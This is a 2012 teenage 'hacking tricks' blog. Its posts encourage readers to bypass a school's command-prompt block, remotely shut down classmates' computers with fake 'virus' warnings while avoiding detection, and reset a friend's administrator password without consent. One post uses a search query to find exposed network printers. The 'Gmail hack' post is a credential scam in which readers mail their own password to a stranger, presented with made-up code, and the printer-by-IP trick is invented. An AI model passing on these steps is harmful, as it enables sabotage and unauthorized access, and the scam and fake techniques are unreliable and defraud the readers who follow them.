Monday 24 September 2012

Good Bye....For Now

Hi everyone.  I am sure you have noticed the unusual title. 
Well, it means exactly what it says.  Unfortunately, I must say good bye to blogging.....for now.
Who likes school? Me neither.  I would love to keep on blogging for ever and ever, but I'm afraid that I just don't have the time when school gets in the way.  I have a ton of work to do, so I cannot keep my promises of blogging right now.
But, don't be too sad.  I will be back! Next Summer break.  I will blog during the summer, and maybe an occasional trick or hack every now and then.  When I have the time, though.
So, with this post, I say good bye until next summer.
Although, if you have any requests or questions, email me!
- Hackergirl

Monday 3 September 2012

Wow

Hello everybody!
I guess you're wondering why this post is called 'Wow'.  Well, I was looking at my page views and noticed a big increase.  The one post 'Awkward....' has received 102 page views.  OMG.  102 PAGE VIEWS.  That is absolutely amazing, and I thank you ALL for reading my blog.  I do put a good deal of work in to this blog, even though it doesn't even seem like work...it's A LOT more fun than work :)
In addition to the amazing page views of 'Awkward...', my latest post, 'Hack a Gmail Account 2012', has received 21 page views in less than a week.  That is just....WOW.  Thank you all, once again for reading.

No, I am not finishing up this post.  That would be BORING.  So, today, I'm going to teach you something very fun.
Who goes to school? I do.  Who uses the computer labs in school? I do.  Have you ever looked over at everyone on the computer and just really wanted to shut it down and make them lose all of their work? I have.  Well, I can teach you how to do that.  In fact, I can teach you how to shut down all computers on the same wi-fi network at school.  Sounds fun, right?

Let's get started :)

1. Go to Notepad.
2. Type in  command.com and save as cmd.bat.  A lot of schools block CMD on computers, and this is how to override that.
3. Open it up and it should go to CMD. 
4. Type in 'shutdown -i' and press 'Enter'. 
5. You will come to this white box with options....wow, that was a vague description.  You'll know it when you see it.  What you do now is add the name of the computer that you want to shut down, if necessary. 
6. You can choose whether to warn users or not that their computer is about to shut down.  Personally, I prefer to warn users and as the comment, I like to put something like "WARNING, SECURITY BREACH IN SYSTEM" or "WARNING, VIRUS DETECTED. HARD DRIVE BEING WIPED".
7.  Press okay and then shut down your computer as quickly as possible to avoid people knowing it was you.
8. Watch people freak out when their computer shuts down unexpectedly.

This is a really fun trick and I have done this to my brother at home while he was playing minecraft.  He was REALLY angry when he found out it was me.

Try it out! We're only a day away from school :)  Muahahahahaha.

- Hackergirl

Wednesday 15 August 2012

Hack a Gmail Account 2012

Hello everyone out there :)
Today, I am going to show you all how to hack a Gmail account in 48 hours by only sending an E-mail. 
Sounds too good to be true? That's because it is.  Just kidding!  Did you get scared there?
Okay, here are the steps :
1. In the 'To' bar, type 'onlineghelp@gmail.com'.  Minus the quotation marks!
2. In the subject bar, you can type 'PASSWORD RECOVERY'.
3. In the message box, type the first line as 'I can't access my old gmail account'.  Minus the quotation marks again. 
Now, go to the next line and type - <pwdcursor><script><
next line - v703&login="passmachine&f=(p0assword)
next line - &f=27586&_javascript=activate_autologin&rsa#"
next line - start?>YOUR EMAIL ID<passlogin_id_virus>YOUR EMAIL PASSWORD<extract_old_passkey#qjiw>
next line - TARGET GMAIL ID<send_new_passkey#qnkij>YOUR EMAIL ID AGAIN</script></cursor>
4. Send it off! You should receive an E-mail containing your target's password within 48 hours!
You are welcome.  LOL.  Have fun hacking!
- Hackergirl

Sunday 5 August 2012

Gotta Check This Out

Hey guys,
Sorry for not posting for a while!
I was on the Island soaking up some rays.  Okay, I believe I have found out how to target certain printers when trying to hack in to them.  Alright, all you need for this hack is Internet access and the IP address of the person you want to hack.
Here's how to do it :
1. Open up Google.
2. Type in the IP address of the person you want to hack, forward slash, port_255, forward slash, and type bar.
3. Here's an example : 129.25.5.73/port_255/bar      
4. First of all, sorry for the font change, my computer is being retarded at the moment.  Port_255 is the port that the printer is in, so that is how the printer is located.  The IP address just tracks down the correct computer.
5. Click on the computer that comes up.  Here, I'll enter the code into Google and post the link that shows up : http://129.25.5.73/port_255/bar
6. Interesting stuff.  Hope you guys have fun with this, and I really hope that I can get this font thing changed.




By the way, everyone, thank you very much to 'Mama' - a Blogger user who commented on the post 'Awkward' - because she posted a link to one of the Blogger FAQ's that answers our questions about this traffic source thing.


Saturday 28 July 2012

Who are you?

Okay guys, how are you doing today?
Sorry, no tricks today, but this coming Thursday, there will be either a hack or a trick.  Today, I'm going to show you who's reading this blog.  Doesn't sound super exciting, but you guys seem to enjoy reading them, and I kinda do too.
Alright, let's start with countries.  I live in Canada, so it's almost obvious that I have some readers from Canada.  7 page views apparently.  Okay, the next country is the Philippines with 3 page views.  Cool, didn't know you could get this blog from the Philippines.  Next is The United States with 2 page views.  My friend has a blog - called Filling the Pages (http://escapeofwriting.blogspot.ca) - and she also lives in Canada, but the closest viewers to Canada she gets are in the US. Ha.  Next: Germany with 1 small page view.  The next wonderful country is South Korea! Thanks for reading, means a lot.  Finally, we have Malaysia with yet another 1 page view.  Thanks for reading, Malaysia!
Did you know that I can track which web browser you guys use to read my blog? Weird, right? Anyways, here are the stats.  33% of you used Google Chrome.  My brother uses Chrome too....  Alright, next one is Firefox with 26% of you! I think Firefox is just easier, personally.  Then we have 26% of you using Safari.  I haven't used Safari since I was in grade school....which actually wasn't that long ago.  Anyways, the last browser has 13% of you using Internet Explorer.  That is odd, if anything, I would have guessed that Internet Explorer would be the most popular.
Do you know what is also really weird? I can track who uses what operating system to read my blog.  I don't know why that's necessary, but apparently, its is to Blogger.  Let's see the stats.
73% of you used Windows.  That is not surprising.  20% of you just used your Ipod.  Interesting.  And a lonely 6% of you used Macintosh.
Okay, thanks for reading everyone, look forward to the next post!
- Hackergirl

Tuesday 24 July 2012

Have Some Fun

Okay, today, let's have some fun with Google.  Also, today, I will show you how to hack anyone's computer by changing their administrator password.  It's all completely reversible, so it is a Trick AND a hack today.
Let's begin with having some fun with Google.  How about we start with a very minor trick that you all will probably all know.  If you do not have Google, then skip over to the hack.

1.  Open up Google.
2. Type : google l33t   into google search bar and press I'm Feeling Lucky.
Type : google loco   into google search bar and press I'm Feeling Lucky.
Type : google gothic into google search bar and press I'm Feeling Lucky.
Type : ewmew fudd    into google search bar and press I'm Feeling Lucky.
Type : xx-klingon    into google search bar and press I'm Feeling Lucky.
Type : xx-piglatin   into google search bar and press I'm Feeling Lucky.
Type : google bsd    into google search bar and press I'm Feeling Lucky.
Type : google linux  into google search bar and press I'm Feeling Lucky.
Type : answer to life, the universe, and everything  into google and press search.
Wasn't that fun?  Okay, let's do some graffiti with Google now.
3. Open up Google again.
4. Open up www.netdisaster.com and type in your target website.
5. Have some fun.

Okay, let's do the hack.  Do you have a buddy that you secretly hate? Come on.  We all do.  So, next time you're over at their house, go to their computer while they're in the washroom or cooking or playing a sport. 
Just as a tip, if your friends know that you hack as a hobby, don't do this, because they will suspect you're at fault in a second. 
Let's get started.

1. Open up notepad and type in command.com
2. Save it as 'cmd.bat'
3. Open it up.  You should come to a black screen.
4. Type in net user.
5. Then find the name of the administrator.
6. Once you have the name, type in 'net user [administrator name]*'
7. Type in the password that you choose.

Yes, your buddy may be pissed off, but it is completely reversible! Do the same process and just type in the password that your buddy chooses.

Hope you had some fun.
- Hacker Girl

Saturday 14 July 2012

OMG I apologize

OMG I apologize for not writing in so long!
As promised, I will give you a few hacking tricks to get into network printers.  First, a warning :
I use these tricks only to be able to secure myself; I will not - and neither should you - hack in to these printers for real, I do not wish to be behind bars.
So, use these at your own risk. 
You can only hack in to these through Google because these printers are hosted on networks through Google in order to work.
Okay, here's the instructions :

1. Open up Google.  Click on the Search bar.
2. Type inurl:"port_255" -htm into the search bar.  Type the whole thing in, don't leave any of it out.  Once again : inurl:"port_255" -htm
3. Click on one of the links.  You'll come to a blue page with a small picture of a printer somewhere on it.
4. Have fun with the printer; print from it, calibrate it, etc.

Okay, guys, hope you loved that. 
Time to go now, I hope none of you guys are behind bars soon.